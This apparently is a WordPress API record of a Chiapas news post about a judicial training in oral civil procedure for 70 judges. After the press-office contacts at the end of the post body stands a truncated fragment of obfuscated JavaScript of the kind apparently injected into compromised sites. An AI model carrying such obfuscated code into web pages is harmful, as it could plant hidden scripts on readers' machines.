{"id":16355,"date":"2024-06-27T00:45:55","date_gmt":"2024-06-27T00:45:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16355"},"modified":"2024-06-27T00:45:56","modified_gmt":"2024-06-27T00:45:56","slug":"realiza-poder-judicial-capacitacion-en-oralidad-civil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16355","title":{"rendered":"Realiza Poder Judicial capacitaci\u00f3n en Oralidad Civil"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" data-id=\"16356\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-3-1024x771.jpeg\" alt=\"\" class=\"wp-image-16356\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-3-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-3-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-3-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-3-1536x1157.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-3.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" data-id=\"16357\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.24-PM-1024x771.jpeg\" alt=\"\" class=\"wp-image-16357\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.24-PM-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.24-PM-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.24-PM-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.24-PM-1536x1157.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.24-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" data-id=\"16358\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-1-1024x771.jpeg\" alt=\"\" class=\"wp-image-16358\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-1-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-1-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-1-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-1-1536x1157.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-26-at-4.32.23-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>26 de junio del 2024. Tuxtla Guti\u00e9rrez.-El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, en seguimiento al compromiso de fortalecer la especializaci\u00f3n para el establecimiento del C\u00f3digo Nacional de Procedimientos Civiles y Familiares, arranc\u00f3 la Capacitaci\u00f3n en materia de Oralidad Civil, en modalidad presencial y virtual, a cargo del secretario T\u00e9cnico de la Cocifam y magistrado del Tribunal Superior de Justicia de la ciudad de M\u00e9xico, Eliseo Juan Hern\u00e1ndez Villaverde.<\/p>\n\n\n\n<p>Teniendo como sede presencial, el Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial; el magistrado presidente dio la bienvenida al ponente, as\u00ed como a las y los magistrados y jueces que se especializar\u00e1n durante dos d\u00edas, en los temas de Conducci\u00f3n de Audiencias en el Juicio Oral Civil y Formalidades en el Desahogo de la Prueba en Materia Oral Civil.<\/p>\n\n\n\n<p>A\u00f1adi\u00f3 que es un honor el tener a personas juzgadoras capacitadas directamente por el secretario t\u00e9cnico de la Comisi\u00f3n para la Coordinaci\u00f3n del Sistema de Justicia Civil y Familiar, en esta ocasi\u00f3n un total de 70 juzgadoras y juzgadores, quienes ya cuentan con los antecedentes en la materia y trabajo arduo con dedicaci\u00f3n, experiencia y constancia desde la capacitaci\u00f3n y retroalimentaci\u00f3n, permitiendo que Chiapas salga adelante a nivel nacional en esta importante Reforma Constitucional.<\/p>\n\n\n\n<p>Acompa\u00f1ado de las y los consejeros de la Judicatura, Zelmira Perla de Roc\u00edo Guti\u00e9rrez Beltr\u00e1n, Mar\u00eda de Lourdes Hern\u00e1ndez Bonilla, Omar Heleria Reyes y Jos\u00e9 Francisco Trujillo Ochoa, Guillermo Ramos P\u00e9rez concluy\u00f3 que desde la colaboraci\u00f3n entre la federaci\u00f3n y los estados, el \u00e9xito de este nuevo sistema brindar\u00e1 a la ciudan\u00eda en Chiapas un mayor y mejor acceso a la justicia, reduciendo costos y tiempos procesales.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021<\/p>\n\n\n\n<p>&nbsp;f&nbsp;: \/poderjudicial.chiapas<\/p>\n\n\n\n<p>&nbsp;t&nbsp;: @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>26 de junio del 2024. Tuxtla Guti\u00e9rrez.-El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, en seguimiento al compromiso de fortalecer la especializaci\u00f3n para el establecimiento del C\u00f3digo Nacional de Procedimientos Civiles y Familiares, arranc\u00f3 la Capacitaci\u00f3n en materia de Oralidad Civil, en modalidad presencial y virtual, a cargo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16358,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16355","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16355"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16355\/revisions"}],"predecessor-version":[{"id":16359,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16355\/revisions\/16359"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16358"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}